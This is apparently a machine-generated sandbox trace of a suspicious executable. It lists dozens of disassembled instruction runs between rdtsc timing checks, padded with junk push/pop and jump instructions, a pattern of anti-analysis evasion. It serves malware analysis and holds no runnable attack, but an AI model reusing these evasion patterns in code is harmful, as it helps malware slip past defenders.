Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 243E6C second address: 243EB6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 movzx edi, si 0x0000000c lea eax, dword ptr [ebp+124978A5h] 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F84B0B050D8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c adc dx, A3C2h 0x00000031 jl 00007F84B0B050DCh 0x00000037 push eax 0x00000038 push esi 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 243EB6 second address: 243EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 243EBC second address: 223FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edx, 52BB3E47h 0x0000000e call dword ptr [ebp+122D1DE8h] 0x00000014 push ecx 0x00000015 pushad 0x00000016 push edi 0x00000017 pop edi 0x00000018 jne 00007F84B0B050D6h 0x0000001e jmp 00007F84B0B050DCh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27E531 second address: 27E535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27E738 second address: 27E73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27E73C second address: 27E765 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65607h 0x00000007 pushad 0x00000008 jmp 00007F84B0D655FDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27EB0E second address: 27EB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F84B0B050E6h 0x0000000d popad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27EB30 second address: 27EB37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27EE2B second address: 27EE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F84B0B050D6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2823FE second address: 282404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 282404 second address: 282449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E3h 0x00000009 popad 0x0000000a jno 00007F84B0B050DEh 0x00000010 jmp 00007F84B0B050E9h 0x00000015 popad 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28556C second address: 285576 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F84B0D655F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 285576 second address: 2855AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F84B0B050E4h 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e jmp 00007F84B0B050E9h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 285106 second address: 285129 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F84B0D655F6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b jno 00007F84B0D655F6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BF2F second address: 28BF35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BF35 second address: 28BF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F84B0D655FCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28A7FE second address: 28A811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jo 00007F84B0B050D6h 0x0000000c jng 00007F84B0B050D6h 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28A811 second address: 28A853 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F84B0D655F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c js 00007F84B0D655F6h 0x00000012 jng 00007F84B0D655F6h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jmp 00007F84B0D65607h 0x0000001f popad 0x00000020 push esi 0x00000021 pushad 0x00000022 popad 0x00000023 jng 00007F84B0D655F6h 0x00000029 pop esi 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28A9B0 second address: 28A9CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F84B0B050E3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28A9CE second address: 28A9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0D655FCh 0x00000009 jmp 00007F84B0D65603h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F84B0D655F6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28A9FA second address: 28AA0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28AA0E second address: 28AA18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F84B0D655F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28AA18 second address: 28AA1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28AE5F second address: 28AE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0D65608h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28AE7B second address: 28AE97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E6h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28AE97 second address: 28AEA7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F84B0D655F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28AEA7 second address: 28AEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28F432 second address: 28F43C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28F43C second address: 28F453 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0B050E0h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28F453 second address: 28F46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F84B0D65603h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28F72C second address: 28F73B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F84B0B050D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28F73B second address: 28F743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28FA01 second address: 28FA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jc 00007F84B0B050DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28FA10 second address: 28FA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 293C65 second address: 293C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29360F second address: 293636 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F84B0D655F6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F84B0D65604h 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 293636 second address: 29363E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29393F second address: 293945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 293945 second address: 29394A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29394A second address: 29395B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F84B0D655FCh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29395B second address: 293961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29B212 second address: 29B279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0D65606h 0x00000009 jmp 00007F84B0D65602h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007F84B0D65601h 0x00000015 jmp 00007F84B0D65607h 0x0000001a jmp 00007F84B0D65600h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29B279 second address: 29B299 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0B050DBh 0x00000008 jmp 00007F84B0B050DEh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 299477 second address: 29947B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2998B5 second address: 2998BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F84B0B050D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2998BF second address: 2998E9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F84B0D65604h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F84B0D655FAh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 299B60 second address: 299B85 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jne 00007F84B0B050D6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop esi 0x00000012 jmp 00007F84B0B050DDh 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 299B85 second address: 299BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F84B0D655F6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F84B0D655FCh 0x00000016 jmp 00007F84B0D65604h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 299BB6 second address: 299BC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29A12B second address: 29A12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29A12F second address: 29A133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29A67C second address: 29A681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29A681 second address: 29A687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29A687 second address: 29A68B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29A68B second address: 29A6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F84B0B050E5h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29ABB9 second address: 29ABBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29ABBD second address: 29ABC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29ABC3 second address: 29ABC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29AF0E second address: 29AF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1FAED2 second address: 1FAEE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 push esi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1FAEE4 second address: 1FAEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A4E00 second address: 2A4E10 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F84B0D655FAh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A4E10 second address: 2A4E28 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F84B0B050D6h 0x00000012 jns 00007F84B0B050D6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A4E28 second address: 2A4E38 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007F84B0D655F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A4E38 second address: 2A4E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A4E3C second address: 2A4E52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65600h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A4E52 second address: 2A4E68 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F84B0B050DCh 0x00000008 je 00007F84B0B050D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F84B0B050D6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A4E68 second address: 2A4E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A4FD0 second address: 2A4FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0B050E1h 0x00000009 jmp 00007F84B0B050E3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A517F second address: 2A5183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A5183 second address: 2A5189 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A5189 second address: 2A51B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F84B0D65609h 0x0000000c jg 00007F84B0D655F6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A51B5 second address: 2A51E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E2h 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F84B0B050E1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A51E0 second address: 2A51F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FAh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A51F0 second address: 2A51F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A5335 second address: 2A5341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F84B0D655F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A54CA second address: 2A54CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A5619 second address: 2A562A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0D655FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0BE5 second address: 2B0BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F84B0B050DEh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0BF7 second address: 2B0C02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F84B0D655F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F5FC0 second address: 1F5FF8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F84B0B050DEh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 je 00007F84B0B050D6h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F84B0B050E4h 0x0000001f jmp 00007F84B0B050DAh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F5FF8 second address: 1F5FFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF1D2 second address: 2AF1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF1DA second address: 2AF1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF1DE second address: 2AF1E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF2F9 second address: 2AF321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jp 00007F84B0D655FCh 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jnp 00007F84B0D655F6h 0x00000015 jmp 00007F84B0D655FBh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF5E3 second address: 2AF60C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F84B0B050DFh 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop esi 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF60C second address: 2AF612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF612 second address: 2AF616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF616 second address: 2AF62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF62C second address: 2AF630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AF630 second address: 2AF648 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65604h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AFA39 second address: 2AFA72 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F84B0B050E9h 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F84B0B050DFh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AFB9F second address: 2AFBA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B0316 second address: 2B031A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B031A second address: 2B0320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
